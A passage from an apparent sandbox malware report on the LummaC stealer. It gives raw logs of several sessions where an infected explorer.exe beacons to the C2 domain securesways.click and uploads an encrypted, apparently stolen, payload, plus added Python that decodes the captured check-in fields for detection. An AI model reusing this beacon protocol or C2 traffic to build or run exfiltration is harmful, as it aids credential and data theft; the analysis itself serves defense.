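    pos = 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # drop any chunk extension
        pos = eol + 2
        if size == 0:                                  # last-chunk
            break
        out += raw[pos:pos + size]
        pos += size
        if raw[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += 2
    return bytes(out)


def captured_fields():
    """Decode the report's request dump into printable field values."""
    body = bytes.fromhex(CAPTURED_REQUEST_HEX)
    fields, incomplete = parse_multipart(body, boundary_from_body(body))
    return {k: v.decode("ascii", "replace") for k, v in fields.items()}, incomplete


def captured_response() -> str:
    """Decode the C2 reply that followed the 200 OK."""
    return dechunk(bytes.fromhex(CAPTURED_RESPONSE_HEX)).decode("ascii")


if __name__ == "__main__":
    fields, incomplete = captured_fields()
    for name, value in fields.items():
        print(f"{name:>4} = {value}")
    print(f"incomplete parts in dump: {incomplete}")
    print("C2 reply:", captured_response())
```

Running it prints the hwid, pid and lid values from the dump, reports one incomplete part (the fourth, cut off after "Content-Disposition: "), and shows the reply ok 8.46.123.189. The same two functions apply unchanged to the later sessions in this report, where only the boundary string and the pid value (2, 3, then 1) differ; for the larger dump in session 7 the binary part that follows the text fields decodes as bytes, which is why parse_multipart returns bytes and leaves the ASCII decoding to captured_fields.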


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49832 | 104.21.16.1 | 443 | 940 | C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-21 14:00:03 UTC | 277 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=TIKP9HLMGXUP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15036
    Host: securesways.click
2024-12-21 14:00:03 UTC | 15036 | OUT | Data Raw: 2d 2d 54 49 4b 50 39 48 4c 4d 47 58 55 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 36 36 34 36 46 38 43 37 42 30 42 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 49 4b 50 39 48 4c 4d 47 58 55 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 49 4b 50 39 48 4c 4d 47 58 55 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 42 31 35 67 31 2d 2d 0d 0a 2d 2d 54 49 4b 50 39 48 4c 4d 47 58 55 50 0d 0a 43 6f 6e 74 65
    Data Ascii: --TIKP9HLMGXUPContent-Disposition: form-data; name="hwid"E86646F8C7B0B95CAC8923850305D13E--TIKP9HLMGXUPContent-Disposition: form-data; name="pid"2--TIKP9HLMGXUPContent-Disposition: form-data; name="lid"AB15g1----TIKP9HLMGXUPConte
2024-12-21 14:00:04 UTC | 1128 | IN | HTTP/1.1 200 OK
    Date: Sat, 21 Dec 2024 14:00:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=d23iejeer635cfnj17rp82j1qm; expires=Wed, 16 Apr 2025 07:46:43 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FwbkyMqJ9APOPm4BjAG09aiHw0B6U0GNiy5mG6v4Wemm5uY1JnfZs%2FM8CKWKD3tWvq0J6OQVDz5vf15HySiMMTjWy9Vti8DmGiCp1LXWToZMxyEF1LgyFoAxC6ksVFXQBBTH7A%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f58656f8c0f7293-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1929&min_rtt=1918&rtt_var=742&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2843&recv_bytes=15971&delivery_rate=1451292&cwnd=158&unsent_bytes=0&cid=58d311fbcabb65d4&ts=956&x=0"
2024-12-21 14:00:04 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-21 14:00:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49838 | 104.21.16.1 | 443 | 940 | C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-21 14:00:06 UTC | 276 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=9SYU6HZEH96
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20520
    Host: securesways.click
2024-12-21 14:00:06 UTC | 15331 | OUT | Data Raw: 2d 2d 39 53 59 55 36 48 5a 45 48 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 36 36 34 36 46 38 43 37 42 30 42 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 53 59 55 36 48 5a 45 48 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 53 59 55 36 48 5a 45 48 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 42 31 35 67 31 2d 2d 0d 0a 2d 2d 39 53 59 55 36 48 5a 45 48 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44
    Data Ascii: --9SYU6HZEH96Content-Disposition: form-data; name="hwid"E86646F8C7B0B95CAC8923850305D13E--9SYU6HZEH96Content-Disposition: form-data; name="pid"3--9SYU6HZEH96Content-Disposition: form-data; name="lid"AB15g1----9SYU6HZEH96Content-D
2024-12-21 14:00:06 UTC | 5189 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Data Ascii: un 4F([:7s~X`nO`i
2024-12-21 14:00:09 UTC | 1138 | IN | HTTP/1.1 200 OK
    Date: Sat, 21 Dec 2024 14:00:09 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=fad41fbiqgok33lvr5rqqcovid; expires=Wed, 16 Apr 2025 07:46:47 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BRgwTfKLxPXJkG2VHe%2BG3%2F5JJ6uR1EKQzQsGmIZgQJbf%2FSalgPqgb0xaSydegNE9a%2BrlpS4I1ENPnSxAAJHsv4XC09Ems1151QVOqLwDdZ70DujuWYsJO0Bz158FxGl5nTVLOA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f58657eee9e1881-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1557&rtt_var=593&sent=16&recv=25&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21476&delivery_rate=1829573&cwnd=238&unsent_bytes=0&cid=678628c1e4c94ca7&ts=3299&x=0"
2024-12-21 14:00:09 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-21 14:00:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49849 | 104.21.16.1 | 443 | 940 | C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-21 14:00:11 UTC | 282 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=7UT9CMYTEQ8VRR08WF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1237
Host: securesways.click
2024-12-21 14:00:11 UTC | 1237 | OUT | Data Raw: 2d 2d 37 55 54 39 43 4d 59 54 45 51 38 56 52 52 30 38 57 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 36 36 34 36 46 38 43 37 42 30 42 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 55 54 39 43 4d 59 54 45 51 38 56 52 52 30 38 57 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 55 54 39 43 4d 59 54 45 51 38 56 52 52 30 38 57 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 42 31 35 67 31 2d 2d 0d 0a 2d 2d 37
Data Ascii: --7UT9CMYTEQ8VRR08WFContent-Disposition: form-data; name="hwid"E86646F8C7B0B95CAC8923850305D13E--7UT9CMYTEQ8VRR08WFContent-Disposition: form-data; name="pid"1--7UT9CMYTEQ8VRR08WFContent-Disposition: form-data; name="lid"AB15g1----7
2024-12-21 14:00:12 UTC | 1139 | IN | HTTP/1.1 200 OK
Date: Sat, 21 Dec 2024 14:00:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=og5vn6rd7k1cfk2n2aum6hlgra; expires=Wed, 16 Apr 2025 07:46:50 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iG00IzgWchaI998c2rAZxlgXEqfKDA16aODhI1TKYFk3GqQCo1275QsGeD%2BmCxWDjW7hzyV5XY%2B9v%2Bh%2F%2F5u9yVzZSkA0QcrO455DvQDKF0NkXG9sPgxc5b6kbU9DNz%2FispY%2BMA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f58659e6d000fa8-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1457&min_rtt=1448&rtt_var=561&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2155&delivery_rate=1917268&cwnd=252&unsent_bytes=0&cid=0750b254bb77b8da&ts=1207&x=0"
2024-12-21 14:00:12 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-21 14:00:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
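Session 8 is the stealer's check-in: a multipart POST to /api carrying three form fields (hwid, pid, lid), answered with a chunked body that reads "ok" followed by an IPv4 address. Session 9 below opens with the same three fields before the encrypted upload. The Python below is an added example, not part of the Joe Sandbox report; it takes the raw bytes exactly as printed in the session 8 dump (the sandbox prints only the first part of a body, so the final boundary is cut short at "-- 7") and recovers the form fields and the de-chunked reply. The meaning given to pid and lid in the comments is an assumption from their names; the report itself only shows the values.

```python
"""Recover LummaC's check-in fields and the C2 reply from the sandbox's raw dumps."""
import re

# POST /api body of session 8, copied from the "Data Raw" dump above. The dump is
# truncated by the sandbox, so it ends in the middle of a boundary ("2d 2d 37").
BEACON_CONTENT_TYPE = "multipart/form-data; boundary=7UT9CMYTEQ8VRR08WF"
BEACON_BODY_HEX = """
2d 2d 37 55 54 39 43 4d 59 54 45 51 38 56 52 52 30 38 57 46 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
45 38 36 36 34 36 46 38 43 37 42 30 42 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a
2d 2d 37 55 54 39 43 4d 59 54 45 51 38 56 52 52 30 38 57 46 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a
2d 2d 37 55 54 39 43 4d 59 54 45 51 38 56 52 52 30 38 57 46 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 42 31 35 67 31 2d 2d 0d 0a 2d 2d 37
"""

# The two chunked-body fragments of the 200 OK reply in the same session, concatenated.
RESPONSE_BODY_HEX = "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a 30 0d 0a 0d 0a"


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn a space-separated hex dump, as the sandbox prints it, into bytes."""
    return bytes.fromhex("".join(dump.split()))


def multipart_boundary(content_type: str) -> bytes:
    """Extract the boundary token from a multipart/form-data Content-Type value."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    return m.group(1).encode()


def parse_multipart_fields(content_type: str, body: bytes) -> dict[str, bytes]:
    """Return {field name: value} for every complete form-data part in `body`.

    A part is  --<boundary>CRLF <headers> CRLFCRLF <value> CRLF  followed by the
    next delimiter. The value is terminated by a lookahead for CRLF "--" rather
    than the full boundary, so the last field survives a dump whose closing
    boundary was truncated, as in the capture above. The boundary is required
    not to occur inside part values, so this is safe for well-formed bodies.
    """
    boundary = re.escape(multipart_boundary(content_type))
    part_re = re.compile(
        rb"--" + boundary + rb"\r\n(?P<headers>.*?)\r\n\r\n(?P<value>.*?)(?=\r\n--)",
        re.DOTALL,
    )
    fields: dict[str, bytes] = {}
    for part in part_re.finditer(body):
        name = re.search(rb'name="([^"]+)"', part.group("headers"))
        if name:
            fields[name.group(1).decode()] = part.group("value")
    return fields


def dechunk(body: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked transfer-coded body into the payload bytes."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)   # hex size, chunk extensions ignored
        if size == 0:                                    # terminating zero-length chunk
            return bytes(out)
        start = eol + 2
        out += body[start:start + size]
        pos = start + size + 2                           # skip the CRLF that ends the chunk


def looks_like_checkin(fields: dict[str, bytes]) -> bool:
    """Heuristic taken from this capture: the beacon's first three fields are hwid, pid, lid."""
    return list(fields)[:3] == ["hwid", "pid", "lid"]


def summarize_checkin() -> dict[str, str]:
    """Pull the identifying fields out of the captured beacon and the server's reply."""
    fields = parse_multipart_fields(BEACON_CONTENT_TYPE, hexdump_to_bytes(BEACON_BODY_HEX))
    return {
        "hwid": fields["hwid"].decode(),   # 32 hex chars; stable across sessions 8 and 9 above
        "pid": fields["pid"].decode(),     # assumed: build/campaign parameter of the stealer
        "lid": fields["lid"].decode(),     # assumed: operator identifier; also constant above
        "reply": dechunk(hexdump_to_bytes(RESPONSE_BODY_HEX)).decode(),  # "ok <ip>"
    }


if __name__ == "__main__":
    for key, value in summarize_checkin().items():
        print(f"{key:6} {value}")
```

Run stand-alone it prints the four recovered values. The practical point for detection is which of them are stable: the hwid and lid are identical in sessions 8 and 9 and so are usable pivots for correlating beacons from one host and campaign, whereas the multipart boundary is regenerated per request (7UT9CMYTEQ8VRR08WF, then LNMEBUH85CDZUNVO0JV) and is worthless as an indicator. The same parser applied to the session 9 preamble yields the same three fields ahead of the 403646-byte encrypted upload.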


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49855 | 104.21.16.1 | 443 | 940 | C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-21 14:00:13 UTC | 285 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=LNMEBUH85CDZUNVO0JV
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 403646
Host: securesways.click
2024-12-21 14:00:13 UTC | 15331 | OUT | Data Raw: 2d 2d 4c 4e 4d 45 42 55 48 38 35 43 44 5a 55 4e 56 4f 30 4a 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 36 36 34 36 46 38 43 37 42 30 42 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 4e 4d 45 42 55 48 38 35 43 44 5a 55 4e 56 4f 30 4a 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 4e 4d 45 42 55 48 38 35 43 44 5a 55 4e 56 4f 30 4a 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 41 42 31 35 67 31 2d 2d 0d 0a
Data Ascii: --LNMEBUH85CDZUNVO0JVContent-Disposition: form-data; name="hwid"E86646F8C7B0B95CAC8923850305D13E--LNMEBUH85CDZUNVO0JVContent-Disposition: form-data; name="pid"1--LNMEBUH85CDZUNVO0JVContent-Disposition: form-data; name="lid"AB15g1--
2024-12-21 14:00:13 UTC | 15331 | OUT | Data Raw: 5b f6 ed 9d 64 74 8a 0a ac 93 e8 60 46 d4 b7 34 51 c2 31 f6 dc 42 15 76 7b a0 68 4a 90 ed 2a 6d 8a dd 0f 92 61 5e ca 03 f0 08 ac 80 88 ab fc 29 3e ba 03 09 f3 8d 40 c4 d0 a1 20 6f 4e 2f 93 d0 e8 f5 ce 6c e6 6d 54 93 46 6c 5f 33 2b ad d6 2e 6d ee 8f c8 a0 8a 93 68 ab ce 8b ec 57 16 2e 39 19 be 6b ba 58 97 18 e8 d4 28 56 a0 b7 32 2c 8b 4b 38 7e 2c a5 04 f7 f9 4e 9b ef 61 f9 a4 47 de 55 9e ba 7e 30 b2 08 1c 7f 95 77 68 46 90 2b 74 f3 0a f7 9d 1a a1 b8 97 78 5a 1f e7 3b 4c 76 f5 41 a5 a2 d4 57 d5 b3 68 c8 04 46 f4 d8 f5 8e 91 1a e8 ad ab 7c be a7 f4 07 92 fc e9 a3 51 6c 97 71 7e 19 b7 d3 c5 35 43 d8 c8 ef 1e 67 41 fd 49 ee b7 19 d7 b5 0b 88 4c e4 22 f7 1a 73 0a ad 86 cf 4d ef 43 3f 13 b2 2c 9e fa 4b 3c 6d 11 73 30 1c 1a 32 5d 3a e7 7c db 07 d0 58 c2 35 5b fc
Data Ascii: [dt`F4Q1Bv{hJ*ma^)>@ oN/lmTFl_3+.mhW.9kX(V2,K8~,NaGU~0whF+txZ;LvAWhF|Qlq~5CgAIL"sMC?,K<ms02]:|X5[
2024-12-21 14:00:13 UTC | 15331 | OUT | Data Raw: a8 ca 08 f4 1f b5 61 7b 13 87 06 a3 ea 88 24 c8 f4 87 97 5b cb f0 53 9c 7c 31 e5 bd 59 4a 33 96 c9 dc 1a 4a f8 f4 f8 83 2a 57 d8 2a 64 1b 04 fc 7d f1 12 d7 fb 4f 1b 96 23 0a be 0a 42 8e ad 9e f1 9d 40 c6 3f b1 ae eb 01 5d 17 58 2b 3d 5f e0 2d 15 f0 65 df a0 6f 8e e8 fe a1 c0 66 c0 36 67 ee 92 1c ab 52 3c f6 93 77 da 3e 23 e8 86 47 93 e9 ab 9d bc 95 ce 46 ff 81 4b 20 83 9c 28 4c 03 aa 1f c2 6f 6b f6 a9 ad 93 98 83 dc 80 47 7f 96 8a d6 aa 83 fe f6 f5 19 7a 97 96 ab 1a 6a 04 b5 75 6d f6 f5 ea 66 90 ed d0 f9 37 93 c2 c5 52 b2 80 35 0f dc a9 96 43 17 f3 ba 8e 4a f6 89 d4 d6 f0 68 7b f9 59 e5 2b 5b ab 60 99 a3 8f c7 4e 89 f5 44 b6 68 02 1f 1d b2 85 0c ff c9 c1 54 03 75 20 19 23 bb a9 80 00 ca a4 78 6f 14 af 57 fd 5b 30 51 7b fd c1 75 da 2d f5 e4 ec 4b 73 49 02
Data Ascii: a{$[S|1YJ3J*W*d}O#B@?]X+=_-eof6gR<w>#GFK (LokGzjumf7R5CJh{Y+[`NDhTu #xoW[0Q{u-KsI
2024-12-21 14:00:13 UTC | 15331 | OUT | Data Raw: bd 1e f9 2a f4 7a f7 c4 be d0 a9 28 8d 33 95 db 8d fb da 0c e1 be eb a5 17 d7 3f 1c 89 13 ad ba fd dd 88 b2 4c 1b f9 41 1e d5 08 cd b9 bd 22 fc 64 9c 63 82 dc 91 2a 47 cd 56 f5 19 36 be b2 e4 d8 cc 1e 25 43 3f 5a 8b 3e 3c c3 31 0e 6f 06 9c 86 f1 cc fd b9 7a d1 12 4c 43 23 3f 5e 6c 93 a7 f3 1e 7d a5 ee 5f dc 97 5b 23 64 e4 26 05 e8 4e d9 ed 4d 8f fd 3b 6f 25 99 a6 2d a3 27 aa 34 be 53 7d 2f 92 35 75 86 5e d1 96 1f 0b f8 c4 50 96 cf 50 a5 e3 68 c7 42 68 ba 16 af 7c f4 86 64 d3 db b6 d9 d7 86 77 af 9c 1f 32 ee d3 f8 3c b3 7d cc e9 46 f0 8e 3a 63 9c 16 43 d3 6e 5a 45 07 03 7a c1 5d 19 e0 42 36 8f d1 15 99 d3 a8 c6 21 4e 88 ba 59 00 5f 30 04 c4 8b 04 dd 17 da 2f 5e a4 8e f8 ff fc d6 d8 2a fd 25 9e d1 3c d2 b3 ea a2 63 ee df 57 60 b8 dd 69 85 45 8d 1f e5 41 af
Data Ascii: *z(3?LA"dc*GV6%C?Z><1ozLC#?^l}_[#d&NM;o%-'4S}/5u^PPhBh|dw2<}F:cCnZEz]B6!NY_0/^*%<cW`iEA
2024-12-21 14:00:13 UTC | 15331 | OUT | Data Raw: 88 9c 72 9c 31 9c 4d 4f 5c d0 20 a6 a1 c4 3c d0 df f6 e7 57 ae 60 9f a2 97 47 18 40 e1 b9 73 83 81 e3 2c 36 69 30 6c d2 62 ba 3c 63 a7 34 72 c6 66 9a f5 8c 76 c4 61 94 3d fc 96 31 3a ea b7 17 93 27 5d 85 65 05 8b 6f 03 39 bb 3f 99 1a 9a 13 3f 91 79 0e 3f e6 29 76 3d c5 67 5f 45 17 75 10 01 11 0c 1e bc b6 3d d0 88 2c 61 a3 76 25 70 bd 85 83 53 66 87 bc 92 49 db 39 9f 08 ed 74 b4 52 35 a4 9a 46 87 dd 76 77 9f c3 89 9b 8b 55 f0 a8 c1 a8 63 40 40 f6 b6 10 5f 0b 7f 8c ca f0 bc 96 59 59 34 0f 6c 89 65 87 e9 bf b5 26 09 66 c0 a9 3a 93 ba b3 3d ce 2e ac f8 32 bc 66 38 6e 53 b9 eb 00 bd 2f a7 85 c0 e8 c7 14 df cf 65 1c fa f3 bd b0 b6 e2 64 ac 88 eb a0 20 84 39 4c 62 01 a7 69 b2 d9 43 9b 6e a8 d6 00 75 61 ce a5 9c 9d 40 0e 5c 29 80 56 c1 76 3d 5c ea b0 90 9d 90 3f
Data Ascii: r1MO\ <W`G@s,6i0lb<c4rfva=1:']eo9??y?)v=g_Eu=,av%pSfI9tR5FvwUc@@_YY4le&f:=.2f8nS/ed 9LbiCnua@\)Vv=\?
2024-12-21 14:00:13 UTC | 15331 | OUT | Data Raw: fa 6b f4 8e 51 b1 e2 de 4d 96 13 84 15 cd 84 9c d6 a0 85 5f 29 ad d0 48 e0 68 81 c7 64 f7 8d 53 e2 e4 7c d9 49 b0 f2 d9 f1 86 5f ab 1f 61 2b f9 da 9a 64 85 c1 2f 30 e2 cf 6f 2e 64 5d bd a5 9c fd 5d 03 eb b3 d5 7b 6d bb b0 d8 2c 7b 8a 7e d6 17 d9 00 5b bb 8a 9b 9e ce 0f 52 77 ed 0f 25 4d 9e e4 c7 2a df ec 4f 00 cc c6 65 cf 89 a2 f1 ef 7f 19 c3 c5 64 39 7a d9 70 2c f9 94 96 9c 84 f1 d0 92 50 7e 0b 4a 7b 9f b7 12 f8 26 f2 3e 4b b3 d0 6f c9 72 b5 62 77 5a c1 40 b8 38 2f 13 e0 9d fe 72 ea 3c df 3d 58 a2 14 f4 9d 7d a9 d5 dc 12 76 7d bb f5 4c e9 aa a6 60 14 ad 7e 71 74 14 9d f2 22 ca bb fb 55 1b 1b e6 56 45 2d 5d ce d8 7d fd 29 a5 ac 7b cf 06 2f 70 98 2e a1 b2 08 67 2f 7c 09 8d d9 f1 1b da ba e0 fb d2 7c 30 7a cd 26 c3 3d 12 7a 72 5f 7f a7 72 54 3a 9c 20 22 d4
Data Ascii: kQM_)HhdS|I_a+d/0o.d]]{m,{~[Rw%M*Oed9zp,P~J{&>KorbwZ@8/r<=X}v}L`~qt"UVE-]}){/p.g/||0z&=zr_rT: "
